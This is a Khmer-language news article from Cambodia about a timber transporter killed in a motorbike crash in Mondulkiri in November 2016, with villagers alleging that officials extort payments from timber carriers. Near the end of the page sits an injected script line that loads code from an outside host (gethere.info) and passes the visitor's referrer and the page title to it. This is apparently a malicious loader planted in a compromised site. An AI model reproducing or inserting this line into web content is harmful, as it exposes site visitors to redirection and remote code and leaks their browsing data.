Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ភ្លៀងហេីយនៅតែត្រដរ ទោះដឹងផ្លូវរអិល ចុងក្រោយបានត្រឹមស្លាប់ខ្លួន

មណ្ឌលគិរី៖ បុរសម្នាក់បើកម៉ូតូដឹកឈើដួលសង្កត់ស្លាប់នៅនឹងកន្លែង ទាំងព្រឹកព្រលឹមថ្ងៃទី៦ខែវិច្ឆិកាឆ្នាំ២០១៦ ត្រង់ចំណុចភូមិចក់ចារ ឃុំស្រែឈូក ស្រុកកែវសីមា ខេត្តមណ្ឌលគិរី។

ហេតុការខាងលើ ត្រូវបានគេសង្ស័យថា មានការប្រដេញជំរឹតទាប្រាក់ពីអ្នកដឹកឈើដោយម៉ូតូ ខណៈដែលពលរដ្ឋដែលរស់នៅឃុំស្រែឈូកអះអាងថា មានក្រុមសមត្ថកិច្ចជាច្រើនស្ថាប័នឈរជើងតាមផ្លូវចាំដកតុង ទាំងយប់ទាំងថ្ងៃ។
តំណាងសហគមន៍ជនជាតិដើមភាគតិចព្នងភូមិ ចក់ចារ ម្នាក់ សុំមិនបញ្ចេញឈ្មោះ បាននិយាយថា បច្ចុប្បន្នពួកគាត់ឃើញមានអ្នកដឹកឈើដោយម៉ូតូ ដូចជាហ្វូងស្រមោច អញ្ចឹង (ពី៥០គ្រឿងទៅ៧០គ្រឿង)ឯណ្ណោះលើកលែងតែមេឃភ្លៀងទេដែលគេមិនសូវឃើញពួកក្រុមនឹងដឹងឈើ។ ក្រុមអ្នកដឹកឈើទាំងនេះ គេដឹកឈើមកពី ក្រុមរការ ស្រុកអូររាំងខេត្តមណ្ឌលគិរី ពួកគេដឹកឈើឆ្លង់កាត់ភូមិ ចក់ចារ បន្តទៅអោយឈ្នួញឈើ ដ៏ល្បីឈ្មោះនៅស្រុកស្នួល នឹង ជាម្ចាស់រោងសិប្បកម្មកែច្នៃឈើ មានឈ្មោះ គង់ គ្រឹង ជាមន្ត្រីយោធា មានខ្នងបង្អែកធំណាស់ គ្មានសមត្ថកិច្ចជំនាញណាហ៊ានប៉ះនោះទេ ។ ចំណែកនៅតាមបណ្តោយផ្លូវដែលក្រុមអ្នកដឹកឈើឆ្លងកាត់ គេឃើញមានសមត្ថកិច្ចជាច្រើនស្ថាប័ន ដូចជា ប៉ូលិសប្រឆាំងបទល្មើសសេដ្ឋកិច្ចក្រសួងមហាផ្ទៃ កម្លាំងអាវុធហត្ថ ខេត្តនឹងស្នាក់ការ យោធា នឹងកម្លាំងចារកម្មក្រសួងមហាផ្ទៃ ទៀតផង ដែលចាំផ្លូវរាប់ក្បាលម៉ូតូ គិតលុយ បើអ្នកណាមិនបានបង់ឬភ្លេចបង់លុយត្រូវបានសមត្ថកិច្ចទាំងនោះធ្វើការប្រដេញដូចគេដេញចាប់ចោអញ្ចឹង។
លោក កុយ ចំរើន មេប៉ុស្គិ៍ ស្រែឈូកបានប្រាប់អោយដឹងថា ពិតជាមានសមត្ថកិច្ចជាច្រើនស្ថាប័ន មែនគេមាន លិខិតបេសក្កកម្ម របស់គេ ។ លោកបានបន្ថែមទៀតថា ជនរងគ្រោះដែលស្លាប់ដោយម៉ូតូដឹកឈើដួលសង្កត់ខាងលើមានឈ្មោះ គាន សុខន ភេទប្រុសអាយុ៣៩ឆ្នាំមានទីលំនៅភូមិមានជ័យទី៣ឃុំស្រែចារ ស្រុកស្នួលខេត្តក្រចេះ បច្ចុប្បន្នសពជនរងគ្រោះត្រូវបានក្រុមគ្រួសារដឹកយកទៅធ្វើបុណ្យតាមប្រពៃណី៕

tnn

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More